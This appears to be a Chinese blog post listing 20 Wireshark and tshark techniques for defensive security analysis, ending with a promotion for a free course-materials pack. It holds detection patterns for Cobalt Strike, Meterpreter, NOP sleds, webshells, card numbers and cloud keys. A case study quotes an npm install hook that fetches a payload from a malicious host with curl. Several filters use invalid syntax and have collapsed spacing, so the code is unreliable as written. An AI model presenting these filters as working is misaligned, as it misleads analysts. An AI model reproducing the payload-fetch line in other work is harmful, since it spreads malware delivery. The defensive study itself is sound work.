20个Wireshark在网络安全分析中的实战技巧
一、基础配置篇
- 安全捕获环境搭建
# 创建隔离分析环境 sudo ip linkset eth0 promisc on sudo tcpdump -i eth0 -s 0 -w /mnt/isolated/evidence.pcap- 预置过滤模板
# 高危协议快速过滤 tcp.port in {135,139,445,3389} || udp.port in {53,123,161,500,4500}- 关键字段标记
- • 右键点击IP →
Apply as Column - • 将TTL异常值设为显眼红色(TTL<64 or TTL>128)
二、攻击检测篇
- 扫描行为识别
# SYN扫描检测 tcp.flags.syn==1and tcp.flags.ack==0and tcp.window_size <=1024- 暴力破解捕获
# SSH爆破特征 tcp.port==22and (tcp.flags.reset==1or tcp.analysis.retransmission)- DNS隐蔽隧道
# 检测长域名请求 dns and frame.len > 256 && !contains(dns.qry.name,".google.")- WebShell通信特征
http.content_type=="application/octet-stream" && http.request.method=="POST" && frame.len >1024- 勒索软件通信
tcp contains "GET /decrypt_instructions" || tls.handshake.extensions_server_name=="lockbit"三、数据泄露监控
- 信用卡外泄检测
frame matches "\\b[3456]\\d{3}[ -]?\\d{4}[ -]?\\d{4}[ -]?\\d{4}\\b"- 数据库拖库行为
mysql.query contains "SELECT" && frame.len >1500 && tcp.srcport==3306- 云凭据泄露
http.request.uri contains "?AccessKeyId=" || tls contains "AKIA"四、高级威胁狩猎
- Cobalt Strike检测
# Beacon心跳包特征 tcp.payload matches "\\x00\\x00\\x00..\\xff\\xff\\xff" && tcp.len between 20and50- Metasploit载荷识别
http contains "Meterpreter" || tcp contains "core_loadlib"- 域渗透横向移动
smb || kerberos && (ip.src==<域控IP>or ip.dst==<域控IP>)- 内存攻击特征
tcp contains "\\x90\\x90\\x90" # NOP sled检测 || http contains ".dll"五、加密流量分析
- TLS指纹识别
# 检测恶意JA3指纹 tls.handshake.ja3 contains "6734f37431670b3ab4292b8f60f29984"- 证书异常检测
tls.handshake.certificate && (x509sat.uTF8String == "Phishing Ltd" || x509ce.dNSName == "freevpn.malicious.ru")六、应急响应实战
- 攻击时间轴重建
tshark -r attack.pcap -T fields -e frame.time -e ip.src -e ip.dst -e tcp.port > timeline.csv- 恶意文件提取
# 从HTTP流量中提取PE文件 tshark -r infection.pcap --export-object http,./malware- 攻击者画像生成
# 提取攻击链关键信息 echo"=== C2服务器 ===" tshark -r c2.pcap -Y "dns" -T fields -e dns.qry.name echo"=== 用户代理 ===" tshark -r c2.pcap -Y "http.user_agent" -T fields -e http.user_agent七、法律合规要点
- •取证规范:全程使用
editcap保留原始时间戳 - •哈希校验:
sha256sum evidence.pcap > chain_of_custody.txt - •隐私过滤:使用
tcprewrite匿名化用户数据
tcprewrite --infile=raw.pcap --outfile=anon.pcap --dstipmap=192.168.1.0/24:10.0.0.0/24八、真实攻击案例分析
案例1:供应链攻击溯源
- 捕获异常NPM包更新请求:
HTTP/1.1200 OK Content-Type: application/json {"version":"1.2.3","scripts":{"install":"curl http://mal-registry.com/payload.sh"}}- 追踪关联IP:
tshark -r breach.pcap -Y "ip.addr==203.0.113.5" -z conv,ip案例2:金融木马通信解密
- 提取恶意DLL中的RC4密钥
- Wireshark配置协议解密:
Protocols -> TLS -> (Pre)-Master-Secret log: /path/to/keys.log九、高阶技巧拓展
- •流量基线比对:使用
capinfos建立正常流量指纹
capinfos -Tm -r baseline.pcap > baseline_profile.txt- •AI辅助分析:集成Suricata告警日志
tshark -r traffic.pcap -Y "frame.comment contains 'ET PHISHING'"- •工控协议解析:自定义Modbus/TCP解析器
dissector_add_uint("tcp.port", 502, modbus_handle);十、重要提醒
- 三层验证原则:流量特征+行为模式+外部情报
- 避免分析陷阱:
- • 勿将CDN IP误判为攻击源
- • 识别合法的云服务通信(如AWS metadata)
- 持续更新知识库:
- • 每日更新
GeoIP2数据库 - • 订阅威胁情报Feeds
- • 每日更新
某次金融攻防演练中,攻击者使用域前置技术隐藏C2通信。防守方通过Wireshark发现异常:
HTTP/2200 OK :authority: legit-cdn.com x-amz-cf-pop: SIN2-C1 # 新加坡节点但TLS证书却显示:
x509ce.dNSName: c2-malicious.tk正是这0.5秒的协议解析差异,阻止了千万级资金损失
附:分析师必备过滤库
# 内网横向移动检测 smb || ldap || winrm || wmi # 加密挖矿特征 tcp contains "stratum+tcp" || http contains "xmr" # 钓鱼页面识别 http contains "login" && http contains "password" && !(http.host contains "corp")当0day攻击发生时,EDR可能沉默、防火墙可能失效,但流过网卡的数据包永远是最诚实的证人。掌握这20项核心技能,意味着你拥有了穿透网络迷雾的终极武器。
资料分享
最后,给大家分享一波网络安全学习资料:
我们作为一个小白想转行网络安全岗位,或者是有一定基础想进一步深化学习,却发现不知从何下手。其实如何选择网络安全学习方向,如何进行实战与理论的结合并不难,找准正确方式很重要。
网络安全学习路线&学习资源
接下来我将从成长路线开始一步步带大家揭开网安的神秘面纱。
1.成长路线图
共可以分为:
一、基础阶段
二、渗透阶段
三、安全管理
四、提升阶段
同时每个成长路线对应的板块都有配套的视频提供:
视频配套资料&国内外网安书籍、文档
网络安全面试题
最后就是大家最关心的网络安全面试题板块
所有资料共87.9G,朋友们如果有需要全套《网络安全入门+进阶学习资源包》,可以扫描下方CSDN官方合作二维码免费领取(如遇扫码问题,可以在评论区留言领取哦)~
